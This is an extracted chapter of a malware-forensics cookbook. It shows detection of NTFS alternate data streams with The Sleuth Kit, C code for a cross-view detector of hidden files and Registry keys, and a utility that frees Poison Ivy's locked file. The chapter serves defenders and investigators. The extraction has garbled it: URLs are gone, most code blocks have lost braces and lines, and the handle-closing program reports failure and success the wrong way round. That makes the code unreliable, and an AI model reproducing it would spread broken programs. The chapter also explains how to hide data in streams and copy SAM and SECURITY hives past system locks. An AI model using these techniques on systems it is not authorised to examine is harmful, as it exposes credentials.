Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code (2011)

Chapter 9. Malware Forensics

In this chapter, we combine malware analysis techniques with forensic tools. The objective is to give you a better understanding of how malware alters a system so that you know what to look for when detecting infections, and how to react when you encounter such malware. Likewise, the chapter gives you some tips on how to build your own tools if the current ones don’t suit your needs. It is important to note that this chapter is not a step-by-step guide with a comprehensive list of actions you should take during an investigation. Rather, the chapter presents a collection of explanations and solutions to specific problems that we think you’ll run into while analyzing or investigating malware incidents.

The Sleuth Kit (TSK)

The Sleuth Kit ( is a C library and a collection of command-line tools for file system forensic investigations. On your Ubuntu system, you can type apt-get install sleuthkit to get the Linux binaries. If the repository doesn’t have the latest version or if you want the precompiled Windows binaries, you can get them from TSK’s SourceForge page at In this section, we’ll use TSK to investigate alternate data streams, hidden files, and hidden Registry keys.

Recipe 10-1: Discovering Alternate Data Streams with TSK

Malware that hides in alternate data streams (ADS) has been around for many years and it is still prevalent today. Explorer and command-line directory listings (via cmd.exe) don’t show data in ADS, so this allows malware to hide files from anyone who doesn’t have special tools to view them. In this recipe, we’ll discuss how those tools work and how you can leverage TSK to detect ADS on both live systems and mounted drives.

Creating ADS

You can create an ADS on your system by specifying a colon (:) between the name of the desired host file and the name of the stream. For example, if you wanted to attach a stream (named “stream”) to C:\host.txt, you could do the following:

C:\> echo "this is a message" > host.txt:stream

When you use dir to view a directory listing, host.txt will exist, but the stream will not. The size of the host.txt file will also not increase. You can still read or modify the stream, but you need to know its name:

C:\> notepad.exe host.txt:stream

Detecting ADS on Live Systems

To detect ADS on live systems, you can use one of the following command-line tools:

·           lads.exe1 by Frank Heyne

·           lns.exe2 by Arne Vidstrom

·           sfind.exe3 by Foundstone

·           streams.exe4 by Mark Russinovich

A caveat to lns.exe and sfind.exe is that they do not detect streams attached to folders or drives. Other than that, the tools operate in a similar manner. They walk the file system from a specified top-level directory using the FindFirstFile and FindNextFile API functions. For each item, the tools call BackupRead to query for any associated named streams. Internally, BackupRead callsNtQueryInformationFile with a FILE_INFORMATION_CLASS of FileStreamInformation. You can find source code showing how to enumerate ADS using BackupRead and by calling the native NtQueryInformationFile API directly on the Microsoft MVPs website.5

Analyzing the Master File Table (MFT) for ADS Info

A weakness with the aforementioned tools is that they will fail to enumerate streams if the host file or directory is hidden. For example, if host.txt and host.txt:stream exist, and a rootkit prevents FindNextFile from listing host.txt, then the tools have no chance of identifying the host.txt:stream. Furthermore, some ADS detection tools suppress streams associated with normal system activity, such as the streams named Zone.Identifier that Internet Explorer attaches to downloaded files. Ignoring these streams can be a good way to cut down on noise, but it can also result in overlooking evidence. The FFSearcher trojan6 created a stream named Zone.Identifier that was actually a malicious DLL and thus remained hidden from some ADS detection tools.

For the few reasons we just described, you may be interested in designing your own ADS detection tool for live systems or learning how to identify streams on mounted drives. You can do all of this with TSK. TSK walks the file system by parsing the MFT directly. Therefore, rootkits that hook FindNextFile will not be an issue. The MFT stores information about all files and folders on disk and is also the authoritative source of evidence regarding ADS. In fact, BackupRead and NtQueryInformationFile are just indirect ways to read the data structures stored in the MFT.

To begin using TSK on a live Windows system, make sure you have administrative privileges (required to open the physical drive) and then use mmls to determine the starting sector for the NTFS partition. In the output of the following command, 63 is the starting sector.

F:\>mmls \\.\PhysicalDrive0

DOS Partition Table

Offset Sector: 0

Units are in 512-byte sectors

      Slot    Start        End          Length       Description

00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)

01:  -----   0000000000   0000000062   0000000063   Unallocated

02:  00:00   0000000063   0067087439   0067087377   NTFS (0x07)

03:  -----   0067087440   0067103504   0000016065   Unallocated

Note With TSK, the commands to find ADS on a live system are almost the same as the ones you use to find ADS on a drive that was mounted read-only on your forensic workstation. Instead of passing \\.\PhysicalDrive0 to the tools, you pass /dev/sdb (or wherever you have mounted the suspect drive).

Once you know the offset of the NTFS partition, you can run fls to enumerate files. Then filter the output for any files with a colon (:) in their name. For example, the following command searches recursively (-r) and prints full paths (-p). The authors narrowed the output down to just show the few ADS that we created for the example case.

F:\> fls -o63 -r -p \\.\PhysicalDrive0

r/r 10815-128-1:    str/host.txt

r/r 10815-128-4:    str/host.txt:binary.exe

r/r 10815-128-3:    str/host.txt:stream

The first number (10815) that you see in each line of the output is the host file’s inode. The inode uniquely identifies each file and directory on the file system. The next number (128) is the MFT attribute type. 128 corresponds to a $DATA attribute. Every file has at least one $DATA attribute, which contains the file’s content. If any files have more than one $DATA attribute, then those extra $DATA attributes are alternate data streams. Each attribute also has a sequence ID so that you can tell the different data streams apart. For example:

·           10815-128-1: Refers to the default $DATA attribute for host.txt. Its sequence ID is 1.

·           10815-128-3: Refers to an alternate stream named “stream.” Its sequence ID is 3.

·           10815-128-4: Refers to the alternate stream named binary.exe. Its sequence ID is 4.

You can get extended information about the file whose inode is 10815 by using the istat command, like this:

F:\> istat -o63 \\.\PhysicalDrive0 10815



Type: $STANDARD_INFORMATION (16-0)   Name: N/A   Resident   size: 72

Type: $FILE_NAME (48-2)   Name: N/A   Resident   size: 82

Type: $DATA (128-1)   Name: $Data   Resident   size: 11

Type: $DATA (128-4)   Name: binary.exe   Non-Resident   size: 218112

Type: $DATA (128-3)   Name: stream   Resident   size: 4

Now you can see the size of each stream. To extract the stream’s content from disk, you can use the icat command. icat reads the MFT to find out which sectors of the disk contain the file’s contents and then rebuilds the file based on that information. The result is you get a copy of the file without having to use CreateFile, CopyFile, or other APIs that rootkits commonly hook to hide or prevent access to files. The following commands show how to extract the content of host.txt file and its two alternate streams.

F:\> icat -o63 \\.\PhysicalDrive0 10815-128-1 > F:\host.txt

F:\> icat -o63 \\.\PhysicalDrive0 10815-128-3 > F:\host.txt_stream

F:\> icat -o63 \\.\PhysicalDrive0 10815-128-4 > F:\host.txt_binary.exe

In summary, using TSK for ADS discovery and extraction requires several steps. However, you can develop an application with TSK’s API that handles all of the steps automatically (see Recipe 10-2). TSK is not immune to rootkits on live systems, but by querying the MFT directly, it can evade many common rootkits that other tools cannot.







Recipe 10-2: Detecting Hidden Files and Directories with TSK


You can find supporting materials for this recipe on the companion DVD.

A useful approach to detecting rootkit activity on live systems is called cross-view. Cross-view–based rootkit detection tools generate information about a system in two or more ways and then look for discrepancies in the results. In order to detect hidden files, this might include reading the MFT for a low-level view and walking the file system with Windows APIs, such asFindFirstFile and FindNextFile, for a high-level view. If files exist in the MFT that cannot be found with the Windows API, then a rootkit may be hiding them. This recipe shows you how to use a cross-view–based hidden file detector that we built using TSK.

The Sleuth Kit API

One of the best things about TSK is that it’s not just a collection of precompiled tools. TSK exposes a C API that you can leverage to write your own applications. The source code ships with a few sample applications that you can compile with Microsoft’s Visual Studio or on Linux with mingw32. The next few pages show you the necessary steps to get started. If you need more information, you can browse the TSK online user’s guide and API reference.7

1. Open the disk image and its encapsulated volume system:

TSK_IMG_INFO *img = tsk_img_open_sing(




 TSK_VS_INFO *vs = tsk_vs_open(img, 0, TSK_VS_TYPE_DETECT);

2. Walk the volume’s partition table by passing a callback function to tsk_vs_part_walk. In the example that follows, the callback function named part_act will be called once for each partition.

tsk_vs_part_walk(vs, 0, vs->part_count - 1, 

     TSK_VS_PART_FLAG_ALLOC, part_act, NULL); 

Your callback function receives a TSK_VS_PART_INFO structure, which contains information about the partition type (e.g., FAT or NTFS) and its starting sector and size.

3. In the code that follows, ignore partitions that do not contain an NTFS file system. Otherwise, open the file system with tsk_fs_open_img. The following code automates the procedure of using mmls to find the starting sector of the NTFS file system (i.e., the –o63 parameter that we passed to TSK tools in Recipe 10-1).


part_act(TSK_VS_INFO * vs, 

         const TSK_VS_PART_INFO * part, 

         void *ptr)


    TSK_FS_INFO *fs;

     // is this an NTFS partition?

    if (memcmp(part->desc, "NTFS", 4) == 0) 


        // open the NTFS file system

        if ((fs = tsk_fs_open_img(vs->img_info, 

            part->start * vs->block_size, 

            TSK_FS_TYPE_DETECT)) == NULL) 



            return TSK_WALK_CONT;   


        // set the flags for how to walk the file system

        int flags = TSK_FS_NAME_FLAG_ALLOC |\



        // register a callback function for enumerating files



            (TSK_FS_DIR_WALK_FLAG_ENUM) flags,

            xview_callback, NULL);



    return TSK_WALK_CONT;


4. After opening the NTFS file system, you can use the tsk_fs_dir_walk function to begin enumerating its contents. The following is a description of the parameters to this function:

·       The first parameter, fs, is a pointer to the open file system object.

·       The second parameter, fs->root_inum, is the inode number of the top-level directory from which to begin walking the file system. If there’s a directory other than the root (i.e., C:\) that you’d like to start with, then you need to find your desired directory’s inode number and use that in place of fs->root_inum.

·       The third parameter, flags, is a value that controls how TSK enumerates files and determines which files/directories to include in the results. The combination of flags we used tells TSK to ignore deleted files, ignore the special orphan files, and perform the walk recursively.

·       The fourth parameter, xview_callback, is a user-defined function that the TSK library calls once for each file or directory that meets the criteria specified by your flags value.

Enumerating Files with the Windows API

Before the xview_callback function executes, you need to generate a list of files that exist on the file system using the Windows API. This is the “high-level” view that we will use for comparison with the list of files in the MFT. In the code that follows, we use a C++ vector (dynamically sizeable array) to collect the full paths to all files and directories. The win32_visible function returns TRUE if a given file or directory is visible using the Windows API. If it cannot find the given file or directory, the function returns FALSE.


 bool win32_visible(char *file)


    std::vector<LPSTR>::iterator it;

    LPSTR p;

     for(it=vfiles.begin(); it!=vfiles.end(); it++) {

        p = *(it);

        if (strcmp(p, file) == 0) {


            return TRUE;



    return FALSE;


 void addfile(LPSTR path)


    LPSTR p = new char[MAX_PATH];

    if (p) { 

        strcpy_s(p, MAX_PATH, path);

        for(int i=0; i<strlen(p); i++) {

            if (p[i] == '\\') p[i] = '/';





 void enumfiles(LPSTR dir)


    HANDLE   hFind;

    char     path[MAX_PATH];

    WIN32_FIND_DATAA fd;

     sprintf_s(path, MAX_PATH, "%s\\*", dir);

     hFind = FindFirstFileA(path, &fd);

    if (hFind == INVALID_HANDLE_VALUE) 


     do {

        if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {

            if (strcmp(fd.cFileName, ".") == 0 || 

                strcmp(fd.cFileName, "..") == 0) {



             sprintf_s(path, MAX_PATH, "%s\\%s", dir, fd.cFileName);




         else {

             sprintf_s(path, MAX_PATH, "%s\\%s", dir, fd.cFileName);



     } while(FindNextFileA(hFind, &fd));




Comparing TSK Data with Windows API Data

This section shows the xview_callback function, which is called once for each file or directory on the system. It receives three arguments: fs_file, which is a pointer to a data structure with information about the file and its metadata, a_path, which identifies the directory in which the file resides, and ptr, which is an optional parameter that you can pass when calling tsk_fs_dir_walk.

The beginning of the function performs a few sanity checks to ensure that the object is a file or a directory, the object’s metadata is available, and the object is not one of the special NTFS metadata files such as $MFT, $Secure, and so on. Then the function cycles through each of the file’s attributes to determine if there is more than one $DATA attribute (thus indicating an alternate stream is present) and also locates the $FILE_NAME_INFORMATION attribute, which detects timestamp-altering malware (explanation forthcoming). More important for this recipe is that it passes the full path of each file or directory to win32_visible. Based on the function’s return value, our program can determine which files are hidden from the Windows API.


xview_callback(TSK_FS_FILE * fs_file, 

                const char *a_path, 

                void *ptr)


    int i, cnt;

    char p[MAX_PATH*2]; 


    std::vector<uint16_t>::iterator it;

     // skip the NTFS system files

    if (!TSK_FS_TYPE_ISNTFS(fs_file->fs_info->ftype) || 

       (fs_file->name == NULL) || 

       (fs_file->name->name[0] == '$')) {

           return TSK_WALK_CONT;


     // skip deleted entries

    if (fs_file->meta == NULL) {

        return TSK_WALK_CONT;


     // skip anything that's not a file or directory

    // or if its a dot directory (. and ..)

    if (((fs_file->meta->type != TSK_FS_META_TYPE_REG) && \

        (fs_file->meta->type != TSK_FS_META_TYPE_DIR)) ||

        ((fs_file->meta->type == TSK_FS_META_TYPE_DIR) && \

        (TSK_FS_ISDOT(fs_file->name->name)))) {

            return TSK_WALK_CONT;


     const TSK_FS_ATTR *fs_name_attr = NULL;

     // cycle through the attributes

    cnt = tsk_fs_file_attr_getsize(fs_file);

    for (i = 0; i < cnt; i++) 


        const TSK_FS_ATTR *fs_attr =

            tsk_fs_file_attr_get_idx(fs_file, i);

         if (!fs_attr)


          // save the $FNA and collect $DATA uniq seq ids

         if (fs_attr->type == TSK_FS_ATTR_TYPE_NTFS_FNAME) {

             fs_name_attr = fs_attr;

         } else if (fs_attr->type == TSK_FS_ATTR_TYPE_NTFS_DATA) {




     // check if files/dirs are visible via win32 api

    memset(p, 0, sizeof(p));

    sprintf(p, "C:/%s/%s", a_path, fs_file->name->name);

    if (!win32_visible(p)) { 

        alert(A_HIDDEN, a_path, fs_file, NULL, fs_name_attr);


     // files with less than two $DATA attribs don't have ADS. 

    // if a file has 2 or more $DATA attribs then ignore the 

    // one with lowest seq id (the default entry). dirs with 

    // less than one $DATA attrib don't have ADS

    if (fs_file->meta->type == TSK_FS_META_TYPE_REG) {

        if (ids.size() < 2) 

            return TSK_WALK_CONT;

         std::sort(ids.begin(), ids.end());


    } else {

         if (ids.size() < 1)

             return TSK_WALK_CONT;


     // cycle through the attributes again...but this 

    // time, print the attribs with seq ids in our list

    for (i = 0; i < cnt; i++) 


        const TSK_FS_ATTR *fs_attr =

            tsk_fs_file_attr_get_idx(fs_file, i);

         if (!fs_attr)


          bool print = false;

          for(it=ids.begin(); it!=ids.end(); it++) {

             if (fs_attr->id == *(it)) {

                 print = true;




          if (print) {

             alert(A_STREAM, a_path, fs_file, fs_attr, fs_name_attr);



     return TSK_WALK_CONT;


Using tsk-xview.exe

Figure 10-1 shows how the output of tsk-xview.exe appears on a system with hidden objects. In this case, the machine is infected with Zeus, which hides its configuration files by hooking NtQueryDirectoryFile.

Figure 10-1: Using tsk-xview.exe to detect hidden files


In the output, you’ll see the full path to the hidden object, its inode, its type (directory or file), its size, and the set of eight timestamps—four from the $STANDARD_INFORMATION Attribute (SIA) and four from the $FILE_NAME Attribute (FNA). Why do we show all eight timestamps? It is so you can detect timestamp-altering malware per the method described by Lance Mueller on his blog.8 When malware uses SetFileTime to change the last access, last write, or creation time of a file, the change applies only to the timestamps in the SIA. Thus, if the timestamps in the SIA predate the timestamps in the FNA, it could indicate the malware is attempting to blend in with older files on disk.

The following output is from the same Zeus-infected machine. Zeus not only hides sdra64.exe with the NtQueryDirectoryFile hook, but it sets two of the file’s timestamps equal to that of ntdll.dll. This makes sdra64.exe appear as if it was installed at the same time as ntdll.dll—which may trick some system administrators into thinking that sdra64.exe is a component of the Windows OS. As you can see in the following output, the creation and last-modified timestamps in the SIA are in 2008 and 2009, respectively. However, the creation and last-modified timestamps in the FNA are in 2010.

 [HIDDEN] C:/WINDOWS/system32/sdra64.exe

  Inode: 116039

  Type: File

  Size: 124416

   SIA Created:         Mon Apr 14 08:00:00 2008

  SIA File Modified:   Mon Feb 09 07:10:48 2009

  SIA MFT Modified:    Fri Jun 25 15:18:16 2010

  SIA Accessed:        Fri Jun 25 15:00:52 2010

   FNA Created:         Fri Jun 25 15:18:16 2010

  FNA File Modified:   Fri Jun 25 15:18:16 2010

  FNA MFT Modified:    Fri Jun 25 15:18:16 2010

  FNA Accessed:        Fri Jun 25 15:18:16 2010

The Disadvantages of tsk-xview.exe

The technique described in this recipe will detect most methods used to hide files, but certainly not all of them. Here are a few attacks that tsk-xview.exe will not be effective against.

·           If malware allows you to enumerate a file with the Windows API, but hooks CreateFile so that you can’t open it, then tsk-xview.exe won’t report anything suspicious.

·           If malware allows you to enumerate and open a file, but hooks ReadFile such that it returns false data upon trying to read the file’s content, tsk-xview.exe won’t report anything suspicious.

·           If malware prevents access to \\.\PhysicalDrive0, such that the tool cannot read the MFT, then tsk-xview.exe will simply not work.

For more information on potential attacks against cross-view–based rootkit detection, see Joanna Rutkowska’s paper “Thoughts about Cross-View based Rootkit Detection.”9

Note Sysinternals’ RootkitRevealer10 is an example of a cross-view–based utility that can discover hidden files and Registry keys. There’s no command-line version of the tool, but you can still use it in a non-interactive manner by passing it the –a (automatically scan and then exit when done) flag and specifying a location for the output file to be written. That way, you can call RootkitRevealer from a script or execute it on a remote system using PsExec. When RootkitRevealer begins, it starts a service on the target system and loads a kernel driver that assists with gathering the data required for the low-level view.





Recipe 10-3: Finding Hidden Registry Data with Microsoft’s Offline API


You can find supporting materials for this recipe on the companion DVD.

By combining TSK’s functionality with Microsoft’s Offline Registry API,11 you can develop tools for detecting hidden data in the Registry. This recipe describes an extension to the cross-view tool discussed in Recipe 10-2. The extension works by comparing the data that exists in the Registry hive files (on disk) with the data that exists in the Registry according to the Windows API. Any discrepancies between the two may indicate attempts to hide data.

Accessing the Registry Hives

For the low-level view of the Registry, you must obtain a copy of the Registry hive files on disk. You can do this by using TSK to make a copy of the files. Note that the System process (PID 4 on Windows XP and 7) locks the hive files so that no other processes can access them while the machine is powered on. However, with TSK you can open the physical drive and carve out the hive file’s contents sector by sector, which bypasses the System process’s locks. Once you’ve made a copy of the hive files, you can parse them with the offline Registry API.

Extracting Registry Hives with TSK

In Recipe 10-1, you learned how to use icat to extract data hidden in ADS. You can perform the same actions as icat using the TSK API in order to extract the Registry hives from a live system. The only prerequisite is that you know the inode of the hive files, which you can find by using the tsk_fs_ifind_path function. The code that follows shows how to get the inode of the software hive, given its path on disk. The fs parameter that you see is a pointer to an open file system object, which you learned how to get in Recipe 10-2.

TSK_INUM_T inum_software;




 icat_dump(fs, inum_software, L"software.bin");

The icat_dump function (this is defined in our program and is not part of the TSK API) takes the inode of a file to dump and an output file name. It uses tsk_fs_open_meta to access the inode’s metadata. The metadata contains the list of sectors on disk where the file’s contents reside. It passes this information and a callback function named icat_action to tsk_fs_file_walk. The icat_actionfunction is called once for each chunk of the file’s contents, which it will write to the specified output file.


icat_action(TSK_FS_FILE * fs_file, TSK_OFF_T a_off, 

             TSK_DADDR_T addr, char *buf, size_t size, 

             TSK_FS_BLOCK_FLAG_ENUM flags, void *ptr)


    if (size == 0)

        return TSK_WALK_CONT;

     if (fwrite(buf, size, 1, (FILE*) ptr) != 1) {

        return TSK_WALK_ERROR;


     return TSK_WALK_CONT;


 int icat_dump(TSK_FS_INFO *fs, TSK_INUM_T inum, LPCWSTR outfile)


    TSK_FS_FILE *fs_file;

     FILE * outf = _wfopen(outfile, L"wb");

    if (outf == NULL) {

        printf("[ERROR] Cannot open %ws\n", outfile);

        return -1;


     fs_file = tsk_fs_file_open_meta(fs, NULL, inum);

    if (!fs_file) {


        return 1;



      (TSK_FS_FILE_WALK_FLAG_ENUM) 0, icat_action, outf);



     return 0;


The example code extracts the software hive to software.bin. You now have a copy of the hive file as if you’d copied it off a mounted drive. The SAM, SECURITY, System, and NTUSER.DAT hive files can be extracted using the same methodology.

Microsoft’s Offline Registry API

The offline Registry API allows you to read from (and write to) a Registry hive outside of the active system’s Registry. This is exactly what you need to parse the hive files you extracted with TSK. The offline Registry API is provided in the Windows Driver Kit12 and implemented as a redistributable DLL named offreg.dll. The tsk-xview.exe tool dynamically links with offreg.dll in order to access the required functions.

There is little to no learning curve involved in using the offline Registry API if you’re already familiar with the standard Windows Registry API. The two are almost the same regarding the parameters they take, but they have different names. For example, to query a key for its information using the Windows Registry API, you can use RegQueryInfoKey. The equivalent function in the offline Registry API is ORQueryInfoKey. The following code shows an example of using the offline Registry API to open a hive file and recursively parse its keys and values.

#include <windows.h>

#include <stdio.h>

#include <offreg.h>

#pragma comment (lib, "offreg.lib")

 #define MAX_KEY_NAME 255     //longest key name

#define MAX_VALUE_NAME 16383 //longest value name

#define MAX_DATA 1024000     //longest data amount

 int EnumerateKeys(ORHKEY OffKey, LPWSTR szKeyName)


    DWORD    nSubkeys;

    DWORD    nValues;

    DWORD    nSize;

    DWORD    dwType;

    DWORD    cbData;

    ORHKEY   OffKeyNext;

    WCHAR    szValue[MAX_VALUE_NAME];

    WCHAR    szSubKey[MAX_KEY_NAME];

    WCHAR    szNextKey[MAX_KEY_NAME];

    int i;

     // get the number of keys and values

    if (ORQueryInfoKey(OffKey, NULL, NULL, &nSubkeys, 

        NULL, NULL, &nValues, NULL, 



        return 0;


     printf("%ws\n", szKeyName);

     // loop for each of the values

    for(i=0; i<nValues; i++) { 

         memset(szValue, 0, sizeof(szValue));

        nSize  = MAX_VALUE_NAME;

        dwType = 0;

        cbData = 0;

         // get the value's name and required data size

        if (OREnumValue(OffKey, i, szValue, &nSize, 

             &dwType, NULL, &cbData) != ERROR_MORE_DATA)




         // allocate memory to store the name

        LPBYTE pData = new BYTE[cbData+2];

        if (!pData) { 



        memset(pData, 0, cbData+2);

         // get the name, type, and data 

        if (OREnumValue(OffKey, i, szValue, &nSize, 

             &dwType, pData, &cbData) != ERROR_SUCCESS)


             delete[] pData;



         // Here you would check if the Windows API can access a

        // value named named szValue in the active system registry 

        // that has a data type of dwType, a size of cbData and 

        // data that matches the contents of pData. 

         printf("  %-12ws\n", szValue);

        delete[] pData;


     // loop for each of the recursion 

    for(i=0; i<nSubkeys; i++) {

        memset(szSubKey, 0, sizeof(szSubKey));

        nSize = MAX_KEY_NAME;

         // get the name of the subkey

        if (OREnumKey(OffKey, i, szSubKey, &nSize, 

             NULL, NULL, NULL) != ERROR_SUCCESS)




         swprintf(szNextKey, MAX_KEY_NAME, L"%s\\%s", 

             szKeyName, szSubKey);

         // open the subkey

        if (OROpenKey(OffKey, szSubKey, &OffKeyNext) 

             == ERROR_SUCCESS)


             // Here you would check if the Windows API can access a 

             // subkey named szSubKey in the active system registry 

             EnumerateKeys(OffKeyNext, szNextKey);




     return 0;


 int _tmain(int argc, _TCHAR* argv[])


    ORHKEY OffHive; 

     // open the extracted hive file

    if (OROpenHive(argv[1], &OffHive) != ERROR_SUCCESS)


        printf("[ERROR] Cannot open hive: %d\n", GetLastError());

        return -1;


     // begin to enumerate from the root key and prepend  

    // "HKEY_LOCAL_MACHINE\\Software" to all keys since that's

    // where they are located in the active system registry

    EnumerateKeys(OffHive, L"HKEY_LOCAL_MACHINE\\Software");


When you run the program, you should see something like this:

C:\> offreg-example.exe software.bin






HKEY_LOCAL_MACHINE\Software\Adobe\Acrobat Reader

HKEY_LOCAL_MACHINE\Software\Adobe\Acrobat Reader\9.0

HKEY_LOCAL_MACHINE\Software\Adobe\Acrobat Reader\9.0\AdobeViewer




We have built the functionality for hidden Registry data into the same tsk-xview.exe application that we used in the previous recipe to find hidden files. Figure 10-2 shows an example of using tsk-xview.exe on a system infected with an early variant of the TDSS/TDL13 rootkit. The –f flag asks the program to skip the file system analysis. You can also pass the –k flag, which will make tsk-xview.exe keep a copy of the extracted Registry hives rather than deleting them. This allows you to analyze the hives using other tools, such as the ones mention later in this chapter.

Figure 10-2: Detecting hidden Registry keys with TSK


The output indicates that HKEY_LOCAL_MACHINE\Software\4DW4R3c was accessible using the offline Registry API, but it could not be enumerated with the Windows API. The key has no values. On the other hand, HKEY_LOCAL_MACHINE\System\ControlSet001\Services\4DW4R3 is hidden and it contains four values related to the service’s configuration. The key has two subkeys, injector and modules, which are also not visible using the Windows API. The keys and values are hidden by a rootkit, which hooks NtEnumerateKey and NtEnumerateValueKey.




Forensic/Incident Response Grab Bag

When you’re out in the field responding to incidents or performing forensic investigations, (heck even at home just using your computer), you never know what you’re going to run into. This section is based on that fact and presents a few tools and techniques that don’t necessarily fit in any category, but can certainly be useful to you in various situations.

Recipe 10-4: Bypassing Poison Ivy’s Locked Files


You can find supporting material for this recipe on the companion DVD.

Hiding files and directories is sometimes more trouble than it’s worth. By hooking APIs or loading a driver that manipulates file system operations, the malware creates a whole slew of additional artifacts that can alert you to its presence. Thus, in an attempt to remain stealthy, the malware might end up having the exact opposite effect. There are other ways, besides using API hooks, that attackers can prevent you from copying or deleting the malware’s components. This recipe shows you how you can investigate and bypass Poison Ivy’s locked files from the command line without rebooting or shutting down.

How Poison Ivy Locks Files

Some variants of the Poison Ivy14 trojan lock files by specifying a restrictive file-sharing mode. To understand how this works, look at the function prototype for the CreateFile API:


  __in          LPCTSTR lpFileName,

  __in          DWORD dwDesiredAccess,

  __in          DWORD dwShareMode,

  __in          LPSECURITY_ATTRIBUTES lpSecurityAttributes,

  __in          DWORD dwCreationDisposition,

  __in          DWORD dwFlagsAndAttributes,

  __in          HANDLE hTemplateFile


The dwShareMode parameter specifies the desired sharing mode, which can be FILE_SHARE_DELETE, FILE_SHARE_READ, FILE_SHARE_WRITE, all of them, or none of them. To specify no sharing, you can call CreateFile with a dwShareMode value of 0. If CreateFile succeeds, it returns a handle to the file. All subsequent calls to CreateFile (by any process) for the same file will fail until the “owning” process closes its handle.

When Poison Ivy executes, it often copies itself to the system32 directory. In the example, it used the name toli.exe. Then it injects code into another process and opens a handle to toli.exe from within the injected process. Thus, the injected process issues a call to CreateFile such as the one shown in the following code:



                      0, // no file sharing



                      0, NULL);

The symptom of such behavior is that you cannot copy toli.exe to another machine for analysis and you also cannot delete it to disinfect the machine. Here’s what you’ll likely see if you attempt either operation (the F: drive is a USB stick).

F:\>copy c:\windows\system32\toli.exe F:\toli-copy.exe

The process cannot access the file because it is being 

used by another process.

        0 file(s) copied.

 F:\>del c:\windows\system32\toli.exe


The process cannot access the file because it is being 

used by another process.  

If you encounter similar error messages on Windows, now you know why it happens. To bypass the restrictive sharing mode, first you need to figure out which process has the file locked. Process Explorer and Process Hacker both have options to search for a DLL or file handle by name. However, you might prefer to use a command-line tool (especially if you’re performing a remote investigation). The Sysinternals handle.exe tool is good for the job. Try it like this:

F:\>handle.exe toli

 Handle v3.42

Copyright (C) 1997-2008 Mark Russinovich

Sysinternals -

 explorer.exe       pid: 1592    204: C:\WINDOWS\system32\toli.exe  

As the output shows, Explorer with PID 1592 is the culprit. It has an open handle to toli.exe with handle value 204. Before you see how to get access to the file, let’s use a kernel debugger to figure out exactly what is preventing our access.

Exploring the Handle with a Kernel Debugger

You won’t need to perform the following steps to copy or delete the locked file; we’re only showing this part so you can understand exactly why the current access attempts fail. For details on how to set up a kernel debugger, see Chapter 14.

1. The first two commands identify the Explorer process and switch into its context.

lkd> !process 0 0

PROCESS 82174278  SessionId: 0  Cid: 0638    Peb: 7ffdb000  

    ParentCid: 060c DirBase: 1215b000  ObjectTable: e1aae630  

    HandleCount: 532 Image: explorer.exe

 lkd> .process /p /r 82174278  

Implicit process is now 82174278

2. The next command prints details about the suspect handle within Explorer. You can see that the handle is to a File object, the object’s address is 82261028, and the object’s name is toli.exe.

lkd> !handle 204

Handle table at e10f2000 with 542 Entries in use

0204: Object: 82261028  GrantedAccess: 00120089 Entry: e1eb2408

Object: 82261028  Type: (823eb040) File

    ObjectHeader: 82261010 (old version)

        HandleCount: 1  PointerCount: 1

        Directory Object: 00000000  

        Name: \WINDOWS\system32\toli.exe {HarddiskVolume1}

3. Using the object’s address, you can apply the fields for a _FILE_OBJECT structure and see the effective sharing modes. As noted in bold, the ShareRead, ShareWrite, and ShareDelete values are all 0. This explains why you cannot currently access the file.

lkd> dt _FILE_OBJECT 82261028 


   +0x000 Type             : 5

   +0x002 Size             : 112

   +0x004 DeviceObject     : 0x823a1c08 _DEVICE_OBJECT

   +0x008 Vpb              : 0x823af130 _VPB

   +0x00c FsContext        : 0xe1e8e0d0 

   +0x010 FsContext2       : 0xe18c8a00 

   +0x014 SectionObjectPointer : 0x81e2667c 

   +0x018 PrivateCacheMap  : (null) 

   +0x01c FinalStatus      : 0

   +0x020 RelatedFileObject : (null) 

   +0x024 LockOperation    : 0 ''

   +0x025 DeletePending    : 0 ''

   +0x026 ReadAccess       : 0x1 ''

   +0x027 WriteAccess      : 0 ''

   +0x028 DeleteAccess     : 0 ''

   +0x029 SharedRead       : 0 ''

   +0x02a SharedWrite      : 0 ''

   +0x02b SharedDelete     : 0 ''


How to Bypass the Locked File

The following list summarizes the options available to you at this point if you need to copy or delete (referred to access in the list) the locked file.

·           Forcefully terminate Explorer and hope Poison Ivy doesn’t reinfect Explorer when it restarts. Then access the file.

·           Boot into safe mode and access the file before Poison Ivy starts.

·           Boot the computer using a live Linux CD, mount the Windows drive with read/write permissions, then access the file.

·           Use an anti-rootkit tool like GMER (see Recipe 10-6) to access the file.

The following code shows yet another technique that is useful because it doesn’t terminate any processes or require rebooting. It is also a command-line utility, so you can use it remotely via PsExec. The program closes the open handle to the file you want to access by creating a duplicate handle with DUPLICATE_CLOSE_SOURCE access rights. This frees up the file for you to access as you wish.

int _tmain(int argc, _TCHAR* argv[])


    if (argc != 3) { 

        _tprintf(_T("Usage: %s <pid> <handle>\n"), argv[0]);

        return -1;


     Enable(SE_DEBUG_NAME); // Enable debug privilege

     DWORD dwPid  = _tcstoul(argv[1], NULL, 0); 

    DWORD dwHval = _tcstoul(argv[2], NULL, 0); 

     HANDLE hDupHandle;

    BOOL bStatus = FALSE;

     HANDLE hProc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwPid);

    if (hProc != NULL) { 

        if (DuplicateHandle(hProc, 




            0, FALSE, 



            if (CloseHandle(hDupHandle)) { 

                bStatus = TRUE;





     if (bStatus) { 

        _tprintf(_T("Cannot close the remote handle!\n"));

    } else {

        _tprintf(_T("Remote handle close succeeded!\n"));


     return 0;


To use the program, you pass it the PID of the owning process (1592 for Explorer in this case) and the handle value for the object you want to access. The following commands show how it closes Explorer’s handle to toli.exe, which then allows you to copy it and/or delete it.

F:\>closehandle.exe 1592 0x204

Remote handle close succeeded!

 F:\>copy c:\windows\system32\toli.exe copy.exe

        1 file(s) copied.

 F:\>del c:\windows\system32\toli.exe

In conclusion, Poison Ivy uses a very simple trick to protect its components, but that is the beauty of it. Refusing to share files with other processes is both legitimate and ordinary, so anti-rootkit tools won’t flag it as suspicious. But it is still an effective way for malware to squeeze in a few moments of extra run-time on the victim system while an investigator figures out how to disable it.


Recipe 10-5: Bypassing Conficker’s File System ACL Restrictions


You can find supporting materials for this recipe on the companion DVD.

